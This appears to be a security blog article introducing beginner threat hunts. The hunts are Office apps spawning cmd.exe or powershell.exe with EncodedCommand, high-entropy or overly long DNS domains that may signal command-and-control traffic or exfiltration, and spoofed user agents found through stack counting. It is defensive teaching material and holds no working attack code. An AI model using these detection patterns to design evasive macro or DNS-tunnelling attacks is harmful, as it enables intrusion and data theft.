Threat hunting techniques don’t always have to be super advanced or complicated to yield beneficial results. There are a number of threat hunts that are simple to carry out, and which can find hidden threats that may not necessarily be picked up by traditional threat detection tools.
The following three hunts are a perfect way for beginner threat hunters and SOC analysts to dip their toes in the water and start honing their skills before building out a more formalized threat hunting program. There’s no complicated technology or data collection mechanisms necessary, just the time and patience to do the work.
Malicious phishing stands as one of the most commonly observed attack vectors. All too often these attacks leverage Microsoft Office documents with malicious macros embedded in them. This is done in order to avoid detection mechanisms that usually fixate on filtering attached executables and other obvious red flags. The phishing mechanisms lure users to open the document and enable macros, allowing the malicious code to run, carrying out its nefarious ends.
Threat hunters can start digging for malicious macro activity by looking through process logging and identifying potential anomalies in parent-child process relationships. A very good indicator of maliciousness is to look for Microsoft Office products (such as winword.exe) spawning cmd.exe or powershell.exe. While this can sometimes be attributed to organizations’ power users, the exact commands running in those child processes should be investigated further. If an analyst finds that the process also used an argument like EncodedCommand, then there is definitely cause for concern.
Looking through DNS logs can provide a ready-made way to identify potential command and control and/or data exfiltration activity over DNS. The easiest way to do this is extract all requested domains from your infrastructure and start looking at their entropy.
In the English language there are certain combinations of letters and patterns that occur very frequently. For example, TH and ST occur over and over again, while other combinations are less common such as ZT or QC. Searching for domain name entropy is the art of searching for strings of text that don’t appear to be “natural.” A great starting point for searching for anomalous entropy can be looking for four or more sequential consonants.
Another hunting technique that can yield dividends for hunters wading into DNS data are to look for abnormally long domain names. Of course, the rise of content delivery networks (CDNs) has somewhat muddied the waters, but regardless this technique continues to bear fruit.
If an organization has the ability to look at HTTP metadata through a tool like Zeek (formerly known as Bro), there’s a lot of revealing information available for hunters. Some of the lowest hanging fruit on this front can be picked from the HTTP headers, especially the user agent data. User agents will typically identify to a server what browser you are using and what plugins and their versions are installed. However, user agent strings are completely customizable, and are very easy to manipulate. A common trick malware developers use is to generate obviously – and sometimes not so obviously – false user agent strings.
Threat hunters can get good results by utilizing the concept of “the principle of least seen” and the stack counting tactic to compare user agents across their environments. This process can reveal statistical outliers to begin parsing through.
Common things to look for (beside glaringly obvious strings) are the subtle changes like dangling periods at the end, small spelling errors (does Mozilla have one “L” or two?), or mysterious spaces (Silverlight is all one word, isn’t it?).
The outliers, whether they are subtle or not so subtle, should be investigated further. It could be a malicious connection, or it could also be a radically out-of-date system that had long been forgotten about.
All three of these easy hunts don’t take much fancy analytical technology or data collection to carry out. In many cases it just takes existing logging and the time to sift and sort through CSVs and pivot tables. The easy wins produced by them, though, could help prove out the need for more sophisticated threat hunting techniques and tools later on down the line. And then of course, don’t forget what comes next. Read: After the Hunt: How to Follow Up On Cyber Threat Hunting Findings.